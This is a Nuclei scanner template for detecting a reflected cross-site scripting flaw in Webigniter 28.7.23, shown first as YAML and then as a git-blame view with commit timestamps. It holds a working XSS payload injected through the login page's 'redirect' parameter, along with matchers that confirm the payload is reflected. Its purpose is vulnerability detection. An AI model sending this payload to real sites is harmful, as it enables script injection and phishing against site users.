nuclei-templates/http/vulnerabilities/other/webigniter-xss.yaml

id: webigniter-xss

info:
  name: Webigniter 28.7.23 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected
    - https://webigniter.net
  metadata:
    verified: true
    max-request: 2
  tags: xss,webigniter

http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
      - '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Webigniter"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502202b5892c130fae79ae0bf8897937cfb3c0ee38a5027dae47d37b3b5720d6f954c022100e205b44352138dbd48e827d0056757829fbff83d9ddc32447398dc94cf6b5f47:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: webigniter-xss`

			`info:`
			`name: Webigniter 28.7.23 - Cross-Site Scripting`
			`author: theamanrawat`
			`severity: medium`
			`description: \|`
			The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
			`reference:`
			`- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected`
			`- https://webigniter.net`
			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 2`
templates added 2023-10-17 07:20:28 +00:00			`tags: xss,webigniter`

			`http:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'`
			`- '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'`

			`stop-at-first-match: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00
templates added 2023-10-17 07:20:28 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "<script>alert(document.domain)</script>"`
			`- "Webigniter"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a0047304502202b5892c130fae79ae0bf8897937cfb3c0ee38a5027dae47d37b3b5720d6f954c022100e205b44352138dbd48e827d0056757829fbff83d9ddc32447398dc94cf6b5f47:922c64590222798bb761d5b6d8e72950`